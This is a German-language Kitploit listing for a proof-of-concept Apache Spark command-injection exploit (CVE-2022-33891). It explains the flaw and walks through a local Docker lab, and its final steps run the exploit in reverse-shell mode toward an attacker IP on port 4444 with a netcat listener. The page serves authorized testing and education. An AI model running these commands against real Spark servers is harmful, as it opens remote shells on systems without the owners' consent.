Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-33891 — Proof-of-concept-Exploit für Apache Spark-Befehlsinjektion (CVE-2022-33891) mit Check- und Reverse-Shell-Modi, der autorisierte Sicherheitstests ermöglicht. | Kitploit
Tools/GitHubGitHub/asepsaepdin/cve-2022-33891
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & Bildung
GitHubasepsaepdin/cve-2022-33891

CVE-2022-33891

Proof-of-concept-Exploit für Apache Spark-Befehlsinjektion (CVE-2022-33891) mit Check- und Reverse-Shell-Modi, der autorisierte Sicherheitstests ermöglicht.

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-33891 - Apache Spark Befehlseinschleusungsschwachstelle

Python


⚠️ Nur für Bildungs- und autorisierte Sicherheitsforschungszwecke

Ursprüngliche Exploit-Autoren

Sehr dankbar dem ursprünglichen PoC-Autor AkbarTrilaksana

Beschreibung

Die Apache Spark UI bietet die Möglichkeit, ACLs über die Konfigurationsoption spark.acls.enable zu aktivieren. Mit einem Authentifizierungsfilter wird überprüft, ob ein Benutzer Zugriffsberechtigungen hat, um die Anwendung anzusehen oder zu ändern. Wenn ACLs aktiviert sind, kann ein Codepfad im HttpSecurityFilter es einer Person ermöglichen, sich durch die Angabe eines beliebigen Benutzernamens als jemand anderen auszugeben. Ein böswilliger Benutzer könnte dann möglicherweise eine Berechtigungsprüfungsfunktion erreichen, die letztendlich einen Unix-Shell-Befehl basierend auf seiner Eingabe erstellt und ausführt. Dies führt zur Ausführung beliebiger Shell-Befehle als der Benutzer, unter dem Spark gerade läuft. Dies betrifft Apache Spark Versionen 3.0.3 und früher, Versionen 3.1.1 bis 3.1.2 und Versionen 3.2.0 bis 3.2.1.


Schritt-für-Schritt-Anleitung

  1. Klone zuerst das Repository

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-33891.git
    
  2. Wechsle in das Verzeichnis

    root@kitploit:~
    cd CVE-2022-33891
    
  3. Installiere die Abhängigkeiten:

    root@kitploit:~
    pip3 install -r requirements.txt --break-system-packages
    
  4. Starte den Container

    root@kitploit:~
    docker compose up
    
  5. Führe in einem neuen Terminal den Befehl aus

    root@kitploit:~
    docker exec -it CVE-2022-33891-spark-1 /bin/bash
    
  6. Gib in der Bash-Sitzung des Containers Folgendes ein:

    root@kitploit:~
    echo "spark.acls.enable       true" >> conf/spark-defaults.conf
    
  7. Optional: Zeige den Inhalt von spark-defaults.conf mit cat an, um sicherzustellen, dass alles korrekt ist.

  8. Verlasse die interaktive Bash-Shell und beende den docker-compose-Prozess mit Strg+C.

  9. Sobald die Container ordnungsgemäß heruntergefahren sind, führe docker-compose up erneut aus

    root@kitploit:~
    docker compose up
    
  10. Überprüfe, ob das Ziel verwundbar ist:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --check
    
  11. Aus Angreifersicht ist die Remote-Code-Ausführung entscheidend, um Zugriff auf eine interaktive Shell zu erhalten. Die Ausführung des folgenden Befehls würde eine Telnet-Reverse-Shell über TCP basierend auf Bash zum System des Angreifers auf Port 4444/TCP auslösen:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --revshell -lh 172.16.10.24 -lp 4444
    
    root@kitploit:~
    nc -nlvp 4444
    

Danksagungen

  • https://github.com/AkbarTrilaksana/cve-2022-33891
  • https://nvd.nist.gov/vuln/detail/cve-2022-33891
Tool herunterladen